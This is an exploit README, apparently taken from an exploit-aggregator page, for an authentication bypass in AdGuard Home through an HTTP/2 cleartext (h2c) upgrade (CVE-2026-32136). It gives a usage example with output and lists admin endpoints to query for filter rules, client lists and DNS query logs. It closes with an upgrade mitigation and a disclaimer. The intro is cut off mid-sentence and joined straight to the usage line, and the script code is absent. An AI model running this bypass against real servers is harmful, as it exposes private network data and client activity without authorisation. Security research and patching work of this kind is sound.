Share
## https://sploitus.com/exploit?id=7CFA9824-93EA-5A12-BDDA-3CA935E7C5E9
# CVE-2026-32136_exploit - AdGuard Home h2c Upgrade Auth Bypass

> Unauthenticated authentication bypass in [AdGuard Home](https://github.com/AdguardTeam/AdGuardHome) ` [port] [path]
```

Defaults: `port=80`, `path=/control/filtering/status`.

### Example

```bash
$ python3 CVE-2026-32136.py 192.168.1.5 80 /control/filtering/status | jq .user_rules
[+] h2c upgrade successful โ€” connection is now HTTP/2
[+] response status: 200
[
  "||tracking.corp.example^",
  "||analytics.internal.example^",
  ...
]
```

`stdout` is the raw response body; status messages are written to `stderr` so the output pipes cleanly into `jq`.

### Other endpoints to try

| Endpoint | Returns |
|---|---|
| `/control/filtering/status` | filter list + `user_rules` |
| `/control/status` | server status, listening interfaces |
| `/control/clients` | DHCP / DNS client list |
| `/control/dns_info` | upstream DNS servers |
| `/control/querylog` | DNS query log (often contains internal hostnames) |

## Mitigation

Upgrade to AdGuard Home `0.107.73` or later.

## References

- VulnTracker: 
- GHSA: 
- Patch: 
- NVD: 
- AdGuard Home releases: 

## Disclaimer

This proof-of-concept is published for educational and defensive research purposes. Do not run it against systems you do not own or have explicit authorization to test.